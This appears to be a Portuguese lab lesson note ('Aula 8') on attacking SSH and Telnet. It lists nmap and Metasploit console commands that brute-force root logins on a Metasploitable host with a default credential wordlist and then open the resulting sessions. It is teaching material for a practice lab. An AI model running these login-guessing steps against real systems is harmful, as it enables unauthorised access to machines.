// Aula 8 - Exploração de acesso ao SSH

# vim /usr/share/metasploit-framework/data/wordlists/root_userpass.txt

https://sourceforge.net/projects/metasploitable/

# nmap -sV 192.168.15.58

# msfconsole

msf > use auxiliary/scanner/ssh/ssh_login

> show options

> set RHOSTS 192.168.15.58

> set USERPASS_FILE /usr/share/metasploit-framework/data/wordlists/root_userpass.txt

> set VERBOSE true

> show options

> run

> sessions -l

> sessions -i 1

> use auxiliary/scanner/telnet/telnet_login

> show options

> set RHOSTS 192.168.15.58

> set THREADS 254

> set VERBOSE true

> set USERPASS_FILE /usr/share/metasploit-framework/data/wordlists/root_userpass.txt

> run

> sessions -l

> sessions -i 1












